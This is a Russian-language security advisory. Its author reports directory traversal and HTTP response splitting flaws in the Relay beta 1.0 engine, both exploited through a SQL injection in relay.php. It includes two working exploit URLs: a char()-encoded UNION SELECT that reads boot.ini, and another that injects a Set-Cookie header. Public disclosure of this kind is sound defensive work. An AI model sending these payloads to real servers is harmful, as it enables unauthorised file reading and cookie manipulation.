New vulnerabilities in Relay

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною новых уязвимостях в движке Relay. Это
Directory Traversal и HTTP Response Spliting уязвимости. Обе уязвимости
связаны с одной SQL Injection в Relay (http://websecurity.com.ua/1485/).
Данные две атаки проводятся через SQL инъекцию.

Эти уязвимости представляют собой необычное использование SQL Injection и с
подобными уязвимостями я периодически сталкиваюсь. В частности, данные
Directory Traversal атаки отличаются от считывания файлов средствами СУБД
(как LOAD_FILE в MySQL) в том, что они не зависят от прав пользователя на
работу с файловой системой. И поэтому данные атаки могут использоваться для
обхода ограничения на работу с файловой системой в СУБД.

Directory Traversal (через SQL Injection):

http://site/relay/relay.php?relay=getFile&fileid=-1%20union%20select%201,char(98,111,111,116,46,105,110,105),char(99,58),char(47,102,105,108,101,115,116,111,114,101),1,1,1,1,1,1,1,1,1,1

Для получения файла boot.ini. На других ОС можно получить другие файлы.

HTTP Response Spliting (через SQL Injection):

http://site/relay/relay.php?relay=getFile&fileid=-1%20union%20select%201,1,1,char(47,102,105,108,101,115,116,111,114,101),char(10,83,101,116,45,67,111,111,107,105,101,58,32,110,97,109,101,61,118,97,108,117,101,59,32,112,97,116,104,61,47,59),1,1,1,1,1,1,1,1,1

Для установки кукиса.

Уязвима версия Relay beta 1.0 (и предыдущие версии).

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/2890/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua